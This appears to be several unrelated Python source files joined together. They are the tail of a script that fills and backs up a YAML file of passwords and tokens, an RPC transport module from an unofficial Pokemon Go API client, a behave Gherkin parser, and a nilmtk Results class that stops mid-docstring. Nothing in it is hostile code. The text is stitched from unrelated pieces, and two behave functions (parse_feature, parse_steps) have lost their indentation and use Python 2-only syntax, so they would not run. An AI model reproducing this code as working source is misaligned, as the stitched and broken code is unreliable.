        os.path.expanduser(
            user_vars_file
        )
    )

    with open(user_vars_file, 'rb') as f:
        user_vars = yaml.safe_load(f.read())

    if not user_vars:
        raise SystemExit(
            'FAIL: The variable file provided [ %s ] is empty.'
            % user_vars_file
        )

    changed = False
    generator = CredentialGenerator()
    # NOTE: dict.items() instead of the Python-2-only dict.iteritems(), so
    # the script also runs under Python 3.
    for entry, value in user_vars.items():
        if value is None or all_args['regen'] is True:
            if entry.endswith('password') or entry.endswith('secret'):
                changed = True
                user_vars[entry] = generator.generator(pw_type='password')
            elif entry.endswith('token'):
                changed = True
                user_vars[entry] = generator.generator(pw_type='token')
            elif entry.endswith('key'):
                changed = True
                user_vars[entry] = generator.generator(pw_type='key')
            elif entry.endswith('uuid'):
                changed = True
                user_vars[entry] = str(uuid.uuid4())
            elif entry.startswith('swift_hash_path'):
                changed = True
                user_vars[entry] = generator.generator(pw_type='key')

    # If changed is set to True, this will archive the old passwords
    if changed is True:
        user_vars_tar_file = '%s.tar' % user_vars_file
        print('Creating backup file [ %s ]' % user_vars_tar_file)
        # Create a tarball if needed
        with tarfile.open(user_vars_tar_file, 'a') as tar:
            os.chmod(user_vars_tar_file, 0o600)
            basename = os.path.basename(user_vars_file)
            # Time stamp the password file in UTC
            utctime = datetime.datetime.utcnow()
            utctime = utctime.strftime('%Y%m%d_%H%M%S')
            backup_name = '%s-%s' % (basename, utctime)
            tar.add(user_vars_file, arcname=backup_name)

    with open(user_vars_file, 'wb') as f:
        os.chmod(user_vars_file, 0o600)
        # Encode explicitly: the file is opened in binary mode, and
        # yaml.safe_dump returns text (str) on Python 3.
        f.write(
            yaml.safe_dump(
                user_vars,
                default_flow_style=False,
                width=1000
            ).encode('utf-8')
        )

    print('Operation Complete, [ %s ] is ready' % user_vars_file)


if __name__ == '__main__':
    main()
|
|
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
from __future__ import absolute_import
import re
import base64
import random
import logging
import requests
import subprocess
from google.protobuf import message
from importlib import import_module
from pgoapi.protobuf_to_dict import protobuf_to_dict
from pgoapi.exceptions import NotLoggedInException, ServerBusyOrOfflineException, ServerSideRequestThrottlingException
from pgoapi.utilities import f2i, h2f, to_camel_case, get_time_ms, get_format_time_diff
from . import protos
from POGOProtos.Networking.Envelopes_pb2 import RequestEnvelope
from POGOProtos.Networking.Envelopes_pb2 import ResponseEnvelope
from POGOProtos.Networking.Requests_pb2 import RequestType
class RpcApi:
    """Low-level RPC transport for the Pokemon Go API.

    Builds protobuf request envelopes (including auth info), POSTs them
    to the server endpoint over a persistent HTTP session, and parses
    protobuf response envelopes back into plain dicts.
    """

    # Class-wide request-id counter; seeded with a random value the first
    # time an instance is constructed, then incremented per request.
    RPC_ID = 0

    def __init__(self, auth_provider):
        self.log = logging.getLogger(__name__)
        self._session = requests.session()
        self._session.headers.update({'User-Agent': 'Niantic App'})
        self._session.verify = True
        self._auth_provider = auth_provider
        if RpcApi.RPC_ID == 0:
            RpcApi.RPC_ID = int(random.random() * 10 ** 18)
            self.log.debug('Generated new random RPC Request id: %s', RpcApi.RPC_ID)

    def get_rpc_id(self):
        """Increment and return the shared RPC request id."""
        RpcApi.RPC_ID += 1
        self.log.debug("Incremented RPC Request ID: %s", RpcApi.RPC_ID)
        return RpcApi.RPC_ID

    def decode_raw(self, raw):
        """Best-effort decode of raw protobuf bytes via the external
        ``protoc --decode_raw`` tool (debugging aid only).

        Returns protoc's stdout (bytes), or an error string when protoc
        is unavailable or fails to start.
        """
        output = error = None
        try:
            process = subprocess.Popen(['protoc', '--decode_raw'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            output, error = process.communicate(raw)
        except Exception:
            # FIX: was a bare `except:`, which also swallowed
            # SystemExit/KeyboardInterrupt.
            output = "Couldn't find protoc in your environment OR other issue..."
        return output

    def get_class(self, cls):
        """Resolve a dotted ``package.module.ClassName`` path to the class."""
        module_, class_ = cls.rsplit('.', 1)
        class_ = getattr(import_module(module_), class_)
        return class_

    def _make_rpc(self, endpoint, request_proto_plain):
        """POST the serialized request envelope to `endpoint`.

        Raises ServerBusyOrOfflineException when the connection fails.
        """
        self.log.debug('Execution of RPC')
        request_proto_serialized = request_proto_plain.SerializeToString()
        try:
            http_response = self._session.post(endpoint, data=request_proto_serialized)
        except requests.exceptions.ConnectionError as e:
            raise ServerBusyOrOfflineException
        return http_response

    def request(self, endpoint, subrequests, player_position):
        """Execute one full RPC round-trip and return the response dict.

        Raises NotLoggedInException when not authenticated (or on server
        status 102) and ServerSideRequestThrottlingException on status 52.
        """
        if not self._auth_provider or self._auth_provider.is_login() is False:
            raise NotLoggedInException()
        request_proto = self._build_main_request(subrequests, player_position)
        response = self._make_rpc(endpoint, request_proto)
        response_dict = self._parse_main_response(response, subrequests)
        # FIX: _parse_main_response() may return False on malformed/HTTP
        # errors; guard with isinstance() before using `in`, otherwise
        # `'auth_ticket' in False` raises TypeError.
        if isinstance(response_dict, dict) and ('auth_ticket' in response_dict) and ('expire_timestamp_ms' in response_dict['auth_ticket']) and (self._auth_provider.is_new_ticket(response_dict['auth_ticket']['expire_timestamp_ms'])):
            had_ticket = self._auth_provider.has_ticket()
            auth_ticket = response_dict['auth_ticket']
            self._auth_provider.set_ticket(
                [auth_ticket['expire_timestamp_ms'], base64.standard_b64decode(auth_ticket['start']), base64.standard_b64decode(auth_ticket['end'])])
            now_ms = get_time_ms()
            h, m, s = get_format_time_diff(now_ms, auth_ticket['expire_timestamp_ms'], True)
            if had_ticket:
                self.log.debug('Replacing old auth ticket with new one valid for %02d:%02d:%02d hours (%s < %s)', h, m, s, now_ms, auth_ticket['expire_timestamp_ms'])
            else:
                self.log.debug('Received auth ticket valid for %02d:%02d:%02d hours (%s < %s)', h, m, s, now_ms, auth_ticket['expire_timestamp_ms'])
        if isinstance(response_dict, dict) and 'status_code' in response_dict:
            sc = response_dict['status_code']
            if sc == 102:
                raise NotLoggedInException()
            elif sc == 52:
                raise ServerSideRequestThrottlingException("Request throttled by server... slow down man")
        return response_dict

    def _build_main_request(self, subrequests, player_position=None):
        """Assemble the RequestEnvelope: ids, position, auth and subrequests."""
        self.log.debug('Generating main RPC request...')
        request = RequestEnvelope()
        request.status_code = 2
        request.request_id = self.get_rpc_id()
        if player_position is not None:
            request.latitude, request.longitude, request.altitude = player_position
        # Prefer the short-lived auth ticket over the oauth token when we
        # have one cached.
        ticket = self._auth_provider.get_ticket()
        if ticket:
            self.log.debug('Found auth ticket - using this instead of oauth token')
            request.auth_ticket.expire_timestamp_ms, request.auth_ticket.start, request.auth_ticket.end = ticket
        else:
            self.log.debug('NO auth ticket found - using oauth token')
            request.auth_info.provider = self._auth_provider.get_name()
            request.auth_info.token.contents = self._auth_provider.get_token()
            request.auth_info.token.unknown2 = 59
        # unknown stuff
        request.unknown12 = 989
        request = self._build_sub_requests(request, subrequests)
        self.log.debug('Generated protobuf request: \n\r%s', request)
        return request

    def _build_sub_requests(self, mainrequest, subrequest_list):
        """Attach each subrequest (dict with payload, or bare int id) to
        the envelope, resolving the matching *Message protobuf class."""
        self.log.debug('Generating sub RPC requests...')
        for entry in subrequest_list:
            if isinstance(entry, dict):
                entry_id = list(entry.items())[0][0]
                entry_content = entry[entry_id]
                entry_name = RequestType.Name(entry_id)
                proto_name = to_camel_case(entry_name.lower()) + 'Message'
                proto_classname = 'POGOProtos.Networking.Requests.Messages_pb2.' + proto_name
                subrequest_extension = self.get_class(proto_classname)()
                self.log.debug("Subrequest class: %s", proto_classname)
                for (key, value) in entry_content.items():
                    if isinstance(value, list):
                        # Lists map onto repeated protobuf fields.
                        self.log.debug("Found list: %s - trying as repeated", key)
                        for i in value:
                            try:
                                self.log.debug("%s -> %s", key, i)
                                r = getattr(subrequest_extension, key)
                                r.append(i)
                            except Exception as e:
                                self.log.warning('Argument %s with value %s unknown inside %s (Exception: %s)', key, i, proto_name, str(e))
                    elif isinstance(value, dict):
                        # Dicts map onto nested message fields.
                        for k in value.keys():
                            try:
                                r = getattr(subrequest_extension, key)
                                setattr(r, k, value[k])
                            except Exception as e:
                                self.log.warning('Argument %s with value %s unknown inside %s (Exception: %s)', key, str(value), proto_name, str(e))
                    else:
                        try:
                            setattr(subrequest_extension, key, value)
                        except Exception as e:
                            # Scalar assignment failed; retry as repeated field.
                            try:
                                self.log.debug("%s -> %s", key, value)
                                r = getattr(subrequest_extension, key)
                                r.append(value)
                            except Exception as e:
                                self.log.warning('Argument %s with value %s unknown inside %s (Exception: %s)', key, value, proto_name, str(e))
                subrequest = mainrequest.requests.add()
                subrequest.request_type = entry_id
                subrequest.request_message = subrequest_extension.SerializeToString()
            elif isinstance(entry, int):
                # Bare request-type id without a message payload.
                subrequest = mainrequest.requests.add()
                subrequest.request_type = entry
            else:
                raise Exception('Unknown value in request list')
        return mainrequest

    def _parse_main_response(self, response_raw, subrequests):
        """Parse the HTTP response into a ResponseEnvelope dict.

        Returns False on HTTP errors, empty bodies, or undecodable protobuf.
        """
        self.log.debug('Parsing main RPC response...')
        if response_raw.status_code != 200:
            self.log.warning('Unexpected HTTP server response - needs 200 got %s', response_raw.status_code)
            self.log.debug('HTTP output: \n%s', response_raw.content.decode('utf-8'))
            return False
        if response_raw.content is None:
            self.log.warning('Empty server response!')
            return False
        response_proto = ResponseEnvelope()
        try:
            response_proto.ParseFromString(response_raw.content)
        except message.DecodeError as e:
            self.log.warning('Could not parse response: %s', str(e))
            return False
        self.log.debug('Protobuf structure of rpc response:\n\r%s', response_proto)
        try:
            self.log.debug('Decode raw over protoc (protoc has to be in your PATH):\n\r%s', self.decode_raw(response_raw.content).decode('utf-8'))
        except Exception:
            # FIX: narrowed from bare `except:` — this is debug-only output.
            self.log.debug('Error during protoc parsing - ignored.')
        response_proto_dict = protobuf_to_dict(response_proto)
        response_proto_dict = self._parse_sub_responses(response_proto, subrequests, response_proto_dict)
        return response_proto_dict

    def _parse_sub_responses(self, response_proto, subrequests_list, response_proto_dict):
        """Decode each sub-response using the *Response protobuf class that
        matches the corresponding subrequest."""
        self.log.debug('Parsing sub RPC responses...')
        response_proto_dict['responses'] = {}
        if 'returns' in response_proto_dict:
            del response_proto_dict['returns']
        list_len = len(subrequests_list) - 1
        i = 0
        for subresponse in response_proto.returns:
            if i > list_len:
                self.log.info("Error - something strange happend...")
                # FIX: stop instead of indexing past the end of
                # subrequests_list (previously raised IndexError).
                break
            request_entry = subrequests_list[i]
            if isinstance(request_entry, int):
                entry_id = request_entry
            else:
                entry_id = list(request_entry.items())[0][0]
            entry_name = RequestType.Name(entry_id)
            proto_name = to_camel_case(entry_name.lower()) + 'Response'
            proto_classname = 'POGOProtos.Networking.Responses_pb2.' + proto_name
            self.log.debug("Parsing class: %s", proto_classname)
            subresponse_return = None
            try:
                subresponse_extension = self.get_class(proto_classname)()
            except Exception as e:
                subresponse_extension = None
                error = 'Protobuf definition for {} not found'.format(proto_classname)
                subresponse_return = error
                self.log.debug(error)
            if subresponse_extension:
                try:
                    subresponse_extension.ParseFromString(subresponse)
                    subresponse_return = protobuf_to_dict(subresponse_extension)
                except Exception:
                    # FIX: narrowed from bare `except:`; keep the error
                    # string as the per-entry result on decode mismatch.
                    error = "Protobuf definition for {} seems not to match".format(proto_classname)
                    subresponse_return = error
                    self.log.debug(error)
            response_proto_dict['responses'][entry_name] = subresponse_return
            i += 1
        return response_proto_dict
|
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
from behave import model, i18n
DEFAULT_LANGUAGE = 'en'
def parse_file(filename, language=None):
    """Read a feature file and parse its content into model objects."""
    # Feature files are always decoded as UTF-8 text.
    with open(filename, 'rb') as stream:
        raw_bytes = stream.read()
    data = raw_bytes.decode('utf8')
    return parse_feature(data, language, filename)
def parse_feature(data, language=None, filename=None):
# ALL data operated on by the parser MUST be unicode
assert isinstance(data, unicode)
try:
result = Parser(language).parse(data, filename)
except ParserError, e:
e.filename = filename
raise
return result
def parse_steps(text, language=None, filename=None):
"""
Parse a number of steps a multi-line text from a scenario.
Scenario line with title and keyword is not provided.
:param text: Multi-line text with steps to parse (as unicode).
:param language: i18n language identifier (optional).
:param filename: Filename (optional).
:return: Parsed steps (if successful).
"""
assert isinstance(text, unicode)
try:
result = Parser(language, variant='steps').parse_steps(text, filename)
except ParserError, e:
e.filename = filename
raise
return result
def parse_tags(text):
    """Parse tags from text (one or more lines, as string).

    :param text: Multi-line text with tags to parse (as unicode).
    :return: List of tags (if successful).
    """
    if not text:
        # Nothing to parse: no tags.
        return []
    tag_parser = Parser()
    return tag_parser.parse_tags(text)
class ParserError(Exception):
    """Raised when feature-file content cannot be parsed.

    The message is enriched with the line number and the offending line
    text when they are available.
    """

    def __init__(self, message, line, filename=None, line_text=None):
        parts = [message]
        if line:
            parts.append(' at line %d' % line)
        if line_text:
            parts.append(": '%s'" % line_text.strip())
        super(ParserError, self).__init__(''.join(parts))
        self.line = line
        self.line_text = line_text
        self.filename = filename

    def __str__(self):
        if self.filename:
            return 'Failed to parse "%s": %s' % (self.filename, self.args[0])
        return 'Failed to parse <string>: %s' % self.args[0]
class Parser(object):
    """Line-oriented state machine that parses Gherkin feature text into
    ``behave.model`` objects (Feature, Scenario, ScenarioOutline, Step,
    Table, ...).  Each input line is dispatched to the ``action_<state>``
    handler selected by the current ``state`` attribute.
    """
    # pylint: disable=W0201,R0902
    # W0201 Attribute ... defined outside __init__() method => reset()
    # R0902 Too many instance attributes (15/10)
    def __init__(self, language=None, variant=None):
        """:param language: i18n language identifier (optional).
        :param variant: Parsing mode, 'feature' (default) or 'steps'.
        """
        if not variant:
            variant = 'feature'
        self.language = language
        self.variant = variant
        self.reset()
    def reset(self):
        """Reset all mutable parser state, ready for a new parse run."""
        # This can probably go away.
        if self.language:
            self.keywords = i18n.languages[self.language]
        else:
            self.keywords = None
        self.state = 'init'
        self.line = 0
        self.last_step = None
        self.multiline_start = None
        self.multiline_leading = None
        self.multiline_terminator = None
        self.filename = None
        self.feature = None
        self.statement = None
        self.tags = []
        self.lines = []
        self.table = None
        self.examples = None
    def parse(self, data, filename=None):
        """Parse feature text and return the resulting model.Feature
        (or None when the input contains no feature).
        """
        self.reset()
        self.filename = filename
        for line in data.split('\n'):
            self.line += 1
            if not line.strip() and not self.state == 'multiline':
                # -- SKIP EMPTY LINES, except in multiline string args.
                continue
            self.action(line)
        if self.table:
            # Close a table that ran to end-of-input.
            self.action_table('')
        feature = self.feature
        if feature:
            feature.parser = self
        self.reset()
        return feature
    def _build_feature(self, keyword, line):
        """Create the model.Feature from a matched feature keyword line."""
        name = line[len(keyword) + 1:].strip()
        self.feature = model.Feature(self.filename, self.line, keyword,
                                     name, tags=self.tags)
        # -- RESET STATE:
        self.tags = []
    def _build_background_statement(self, keyword, line):
        """Create the model.Background; backgrounds may not carry tags."""
        if self.tags:
            msg = 'Background supports no tags: @%s' % (' @'.join(self.tags))
            raise ParserError(msg, self.line, self.filename, line)
        name = line[len(keyword) + 1:].strip()
        statement = model.Background(self.filename, self.line, keyword, name)
        self.statement = statement
        self.feature.background = self.statement
    def _build_scenario_statement(self, keyword, line):
        """Create a model.Scenario and attach it to the current feature."""
        name = line[len(keyword) + 1:].strip()
        self.statement = model.Scenario(self.filename, self.line,
                                        keyword, name, tags=self.tags)
        self.feature.add_scenario(self.statement)
        # -- RESET STATE:
        self.tags = []
    def _build_scenario_outline_statement(self, keyword, line):
        """Create a model.ScenarioOutline and attach it to the feature."""
        # pylint: disable=C0103
        # C0103 Invalid name "build_scenario_outline_statement", too long.
        name = line[len(keyword) + 1:].strip()
        self.statement = model.ScenarioOutline(self.filename, self.line,
                                               keyword, name, tags=self.tags)
        self.feature.add_scenario(self.statement)
        # -- RESET STATE:
        self.tags = []
    def _build_examples(self, keyword, line):
        """Create a model.Examples block for the current ScenarioOutline."""
        if not isinstance(self.statement, model.ScenarioOutline):
            message = 'Examples must only appear inside scenario outline'
            raise ParserError(message, self.line, self.filename, line)
        name = line[len(keyword) + 1:].strip()
        self.examples = model.Examples(self.filename, self.line,
                                       keyword, name)
        # pylint: disable=E1103
        # E1103 Instance of 'Background' has no 'examples' member
        # (but some types could not be inferred).
        self.statement.examples.append(self.examples)
    def diagnose_feature_usage_error(self):
        """Explain why a 'Feature' keyword was rejected at this point."""
        if self.feature:
            return "Multiple features in one file are not supported."
        else:
            return "Feature should not be used here."
    def diagnose_background_usage_error(self):
        """Explain why a 'Background' keyword was rejected at this point."""
        if self.feature and self.feature.scenarios:
            return "Background may not occur after Scenario/ScenarioOutline."
        elif self.tags:
            return "Background does not support tags."
        else:
            return "Background should not be used here."
    def diagnose_scenario_usage_error(self):
        """Explain why a 'Scenario' keyword was rejected at this point."""
        if not self.feature:
            return "Scenario may not occur before Feature."
        else:
            return "Scenario should not be used here."
    def diagnose_scenario_outline_usage_error(self):
        """Explain why a 'ScenarioOutline' keyword was rejected here."""
        if not self.feature:
            return "ScenarioOutline may not occur before Feature."
        else:
            return "ScenarioOutline should not be used here."
    def ask_parse_failure_oracle(self, line):
        """
        Try to find the failure reason when a parse failure occurs:
        Oracle, oracle, ... what went wrong?
        Zzzz
        :param line: Text line where parse failure occured (as string).
        :return: Reason (as string) if an explanation is found.
            Otherwise, empty string or None.
        """
        feature_kwd = self.match_keyword('feature', line)
        if feature_kwd:
            return self.diagnose_feature_usage_error()
        background_kwd = self.match_keyword('background', line)
        if background_kwd:
            return self.diagnose_background_usage_error()
        scenario_kwd = self.match_keyword('scenario', line)
        if scenario_kwd:
            return self.diagnose_scenario_usage_error()
        scenario_outline_kwd = self.match_keyword('scenario_outline', line)
        if scenario_outline_kwd:
            return self.diagnose_scenario_outline_usage_error()
        # -- OTHERWISE:
        if self.variant == 'feature' and not self.feature:
            return "No feature found."
        # -- FINALLY: No glue what went wrong.
        return None
    def action(self, line):
        """Dispatch one input line to the handler for the current state.
        Comment lines are consumed here; a leading '# language: xx'
        comment (before any content) switches the keyword set.
        Raises ParserError when no handler accepts the line.
        """
        if line.strip().startswith('#') and not self.state == 'multiline':
            if self.keywords or self.state != 'init' or self.tags:
                return
            line = line.strip()[1:].strip()
            if line.lstrip().lower().startswith('language:'):
                language = line[9:].strip()
                self.language = language
                self.keywords = i18n.languages[language]
            return
        func = getattr(self, 'action_' + self.state, None)
        if func is None:
            line = line.strip()
            msg = "Parser in unknown state %s;" % self.state
            raise ParserError(msg, self.line, self.filename, line)
        if not func(line):
            line = line.strip()
            msg = u"\nParser failure in state %s, at line %d: '%s'\n" % \
                  (self.state, self.line, line)
            reason = self.ask_parse_failure_oracle(line)
            if reason:
                msg += u"REASON: %s" % reason
            raise ParserError(msg, None, self.filename)
    def action_init(self, line):
        """Handle lines before the feature line: tags or the feature itself."""
        line = line.strip()
        if line.startswith('@'):
            self.tags.extend(self.parse_tags(line))
            return True
        feature_kwd = self.match_keyword('feature', line)
        if feature_kwd:
            self._build_feature(feature_kwd, line)
            self.state = 'feature'
            return True
        return False
    def subaction_detect_next_scenario(self, line):
        """Detect tag lines or the start of the next Scenario or
        ScenarioOutline; shared by several state handlers."""
        if line.startswith('@'):
            self.tags.extend(self.parse_tags(line))
            self.state = 'next_scenario'
            return True
        scenario_kwd = self.match_keyword('scenario', line)
        if scenario_kwd:
            self._build_scenario_statement(scenario_kwd, line)
            self.state = 'scenario'
            return True
        scenario_outline_kwd = self.match_keyword('scenario_outline', line)
        if scenario_outline_kwd:
            self._build_scenario_outline_statement(scenario_outline_kwd, line)
            self.state = 'scenario'
            return True
        # -- OTHERWISE:
        return False
    def action_feature(self, line):
        """Collect feature description lines; detect Background or the
        first Scenario/ScenarioOutline."""
        line = line.strip()
        if self.subaction_detect_next_scenario(line):
            return True
        background_kwd = self.match_keyword('background', line)
        if background_kwd:
            self._build_background_statement(background_kwd, line)
            self.state = 'steps'
            return True
        self.feature.description.append(line)
        return True
    def action_next_scenario(self, line):
        """
        Entered after first tag for Scenario/ScenarioOutline is detected.
        """
        line = line.strip()
        if self.subaction_detect_next_scenario(line):
            return True
        return False
    def action_scenario(self, line):
        """
        Entered when Scenario/ScenarioOutline keyword/line is detected.
        Hunts/collects scenario description lines.
        DETECT:
        * first step of Scenario/ScenarioOutline
        * next Scenario/ScenarioOutline.
        """
        line = line.strip()
        step = self.parse_step(line)
        if step:
            # -- FIRST STEP DETECTED: End collection of scenario descriptions.
            self.state = 'steps'
            self.statement.steps.append(step)
            return True
        # -- CASE: Detect next Scenario/ScenarioOutline
        # * Scenario with scenario description, but without steps.
        # * Title-only scenario without scenario description and steps.
        if self.subaction_detect_next_scenario(line):
            return True
        # -- OTHERWISE: Add scenario description line.
        # pylint: disable=E1103
        # E1103 Instance of 'Background' has no 'description' member...
        self.statement.description.append(line)
        return True
    def action_steps(self, line):
        """
        Entered when first step is detected (or nested step parsing).
        Subcases:
        * step
        * multi-line text (doc-string), following a step
        * table, following a step
        * examples for a ScenarioOutline, after ScenarioOutline steps
        DETECT:
        * next Scenario/ScenarioOutline
        """
        # pylint: disable=R0911
        # R0911 Too many return statements (8/6)
        stripped = line.lstrip()
        if stripped.startswith('"""') or stripped.startswith("'''"):
            # Start of a triple-quoted multi-line doc-string argument;
            # remember the indent so it can be stripped from each line.
            self.state = 'multiline'
            self.multiline_start = self.line
            self.multiline_terminator = stripped[:3]
            self.multiline_leading = line.index(stripped[0])
            return True
        line = line.strip()
        step = self.parse_step(line)
        if step:
            self.statement.steps.append(step)
            return True
        if self.subaction_detect_next_scenario(line):
            return True
        examples_kwd = self.match_keyword('examples', line)
        if examples_kwd:
            self._build_examples(examples_kwd, line)
            self.state = 'table'
            return True
        if line.startswith('|'):
            assert self.statement.steps, "TABLE-START without step detected."
            self.state = 'table'
            return self.action_table(line)
        return False
    def action_multiline(self, line):
        """Collect lines of a triple-quoted doc-string step argument until
        the matching terminator is seen."""
        if line.strip().startswith(self.multiline_terminator):
            # Terminator found: attach the collected text to the last step.
            step = self.statement.steps[-1]
            step.text = model.Text(u'\n'.join(self.lines), u'text/plain',
                                   self.multiline_start)
            if step.name.endswith(':'):
                step.name = step.name[:-1]
            self.lines = []
            self.multiline_terminator = None
            self.state = 'steps'
            return True
        self.lines.append(line[self.multiline_leading:])
        # -- BETTER DIAGNOSTICS: May remove non-whitespace in execute_steps()
        removed_line_prefix = line[:self.multiline_leading]
        if removed_line_prefix.strip():
            message = "BAD-INDENT in multiline text: "
            message += "Line '%s' would strip leading '%s'" % \
                       (line, removed_line_prefix)
            raise ParserError(message, self.line, self.filename)
        return True
    def action_table(self, line):
        """Collect table rows; the first non-table line closes the table
        and is re-dispatched to action_steps()."""
        line = line.strip()
        if not line.startswith('|'):
            if self.examples:
                # Table belongs to a ScenarioOutline Examples block.
                self.examples.table = self.table
                self.examples = None
            else:
                # Table is the argument of the preceding step.
                step = self.statement.steps[-1]
                step.table = self.table
                if step.name.endswith(':'):
                    step.name = step.name[:-1]
            self.table = None
            self.state = 'steps'
            return self.action_steps(line)
        cells = [cell.strip() for cell in line.split('|')[1:-1]]
        if self.table is None:
            # First row becomes the table headings.
            self.table = model.Table(cells, self.line)
        else:
            if len(cells) != len(self.table.headings):
                raise ParserError("Malformed table", self.line)
            self.table.add_row(cells, self.line)
        return True
    def match_keyword(self, keyword, line):
        """Return the language-specific alias for `keyword` that starts
        `line` (followed by ':'), or False if none matches."""
        if not self.keywords:
            # No '# language:' comment seen: fall back to English.
            self.language = DEFAULT_LANGUAGE
            self.keywords = i18n.languages[DEFAULT_LANGUAGE]
        for alias in self.keywords[keyword]:
            if line.startswith(alias + ':'):
                return alias
        return False
    def parse_tags(self, line):
        '''
        Parse a line with one or more tags:
          * A tag starts with the AT sign.
          * A tag consists of one word without whitespace chars.
          * Multiple tags are separated with whitespace chars
          * End-of-line comment is stripped.
        :param line:  Line with one/more tags to process.
        :raise ParseError: If syntax error is detected.
        '''
        assert line.startswith('@')
        tags = []
        for word in line.split():
            if word.startswith('@'):
                tags.append(model.Tag(word[1:], self.line))
            elif word.startswith('#'):
                break  # -- COMMENT: Skip rest of line.
            else:
                # -- BAD-TAG: Abort here.
                raise ParserError("tag: %s (line: %s)" % (word, line),
                                  self.line, self.filename)
        return tags
    def parse_step(self, line):
        """Try to parse `line` as a step; return a model.Step or None.
        'And'/'But' steps inherit the type of the preceding step."""
        for step_type in ('given', 'when', 'then', 'and', 'but'):
            for kw in self.keywords[step_type]:
                # A trailing '<' in the keyword table means no separating
                # whitespace is required after the keyword.
                if kw.endswith('<'):
                    whitespace = ''
                    kw = kw[:-1]
                else:
                    whitespace = ' '
                # try to match the keyword; also attempt a purely lowercase
                # match if that'll work
                if not (line.startswith(kw + whitespace)
                        or line.lower().startswith(kw.lower() + whitespace)):
                    continue
                name = line[len(kw):].strip()
                if step_type in ('and', 'but'):
                    if not self.last_step:
                        raise ParserError("No previous step", self.line)
                    step_type = self.last_step
                else:
                    self.last_step = step_type
                step = model.Step(self.filename, self.line, kw, step_type,
                                  name)
                return step
        return None
    def parse_steps(self, text, filename=None):
        """
        Parse support for execute_steps() functionality that supports step with:
        * multiline text
        * table
        :param text:  Text that contains 0..* steps
        :return: List of parsed steps (as model.Step objects).
        """
        assert isinstance(text, unicode)
        if not self.language:
            self.language = u"en"
        self.reset()
        self.filename = filename
        # Steps are collected on a dummy scenario container.
        self.statement = model.Scenario(filename, 0, u"scenario", u"")
        self.state = 'steps'
        for line in text.split("\n"):
            self.line += 1
            if not line.strip() and not self.state == 'multiline':
                # -- SKIP EMPTY LINES, except in multiline string args.
                continue
            self.action(line)
        # -- FINALLY:
        if self.table:
            self.action_table("")
        steps = self.statement.steps
        return steps
|
|
import abc
import pandas as pd
import copy
from .timeframe import TimeFrame
from nilmtk.utils import get_tz, tz_localize_naive
class Results(object):
    """Stats results from each node need to be assigned to a specific
    class so we know how to combine results from multiple chunks. For
    example, Energy can be simply summed; while dropout rate should be
    averaged, and gaps need to be merged across chunk boundaries. Results
    objects contain a DataFrame, the index of which is the start timestamp for
    which the results are valid; the first column ('end') is the end
    timestamp for which the results are valid. Other columns are accumulators
    for the results.
    Attributes
    ----------
    _data : DataFrame
        Index is period start.
        Columns are: `end` and any columns for internal storage of stats.
    Static Attributes
    -----------------
    name : str
        The string used to cache this results object.
    """
    # NOTE(review): Python 2 metaclass hook; it is ignored on Python 3.
    __metaclass__ = abc.ABCMeta
    def __init__(self):
        # One row per processed chunk: index = period start, 'end' column
        # = period end, remaining columns = per-stat accumulators.
        self._data = pd.DataFrame(columns=['end'])
    def combined(self):
        """Return all results from each chunk combined.  Either return single
        float for all periods or a dict where necessary, e.g. if
        calculating Energy for a meter which records both apparent
        power and active power then get active power with
        energyresults.combined['active']
        """
        return self._data[self._columns_with_end_removed()].sum()
    def per_period(self):
        """return a DataFrame.  Index is period start.
        Columns are: end and <stat name>
        """
        return copy.deepcopy(self._data)
    def simple(self):
        """Returns the simplest representation of the results."""
        return self.combined()
    def append(self, timeframe, new_results):
        """Append a single result.
        Parameters
        ----------
        timeframe : nilmtk.TimeFrame
        new_results : dict
        """
        if not isinstance(timeframe, TimeFrame):
            raise TypeError("`timeframe` must be of type 'nilmtk.TimeFrame',"
                            " not '{}' type.".format(type(timeframe)))
        if not isinstance(new_results, dict):
            raise TypeError("`new_results` must of a dict, not '{}' type."
                            .format(type(new_results)))
        # check that there is no overlap
        for index, series in self._data.iterrows():
            tf = TimeFrame(index, series['end'])
            tf.check_for_overlap(timeframe)
        # NOTE(review): Python 2 semantics — `dict.keys()` must return a
        # list for the `+` concatenation, and `iteritems()` does not exist
        # on Python 3.
        row = pd.DataFrame(index=[timeframe.start],
                           columns=['end'] + new_results.keys())
        row['end'] = timeframe.end
        for key, val in new_results.iteritems():
            row[key] = val
        # NOTE(review): DataFrame.append is a legacy (pre-pandas-2.0) API.
        self._data = self._data.append(row, verify_integrity=True)
        self._data.sort_index(inplace=True)
    def check_for_overlap(self):
        """Raise if any two stored periods overlap in time."""
        # TODO this could be made much faster
        n = len(self._data)
        index = self._data.index
        for i in range(n):
            row1 = self._data.iloc[i]
            tf1 = TimeFrame(index[i], row1['end'])
            for j in range(i+1, n):
                row2 = self._data.iloc[j]
                tf2 = TimeFrame(index[j], row2['end'])
                tf1.check_for_overlap(tf2)
    def update(self, new_result):
        """Add results from a new chunk.
        Parameters
        ----------
        new_result : Results subclass (same
            class as self) from new chunk of data.
        """
        if not isinstance(new_result, self.__class__):
            raise TypeError("new_results must be of type '{}'"
                            .format(self.__class__))
        if new_result._data.empty:
            return
        self._data = self._data.append(new_result._data)
        self._data.sort_index(inplace=True)
        self.check_for_overlap()
    def unify(self, other):
        """Take results from another table of data (another physical meter)
        and merge those results into self.  For example, if we have a dual-split
        mains supply then we want to merge the results from each physical meter.
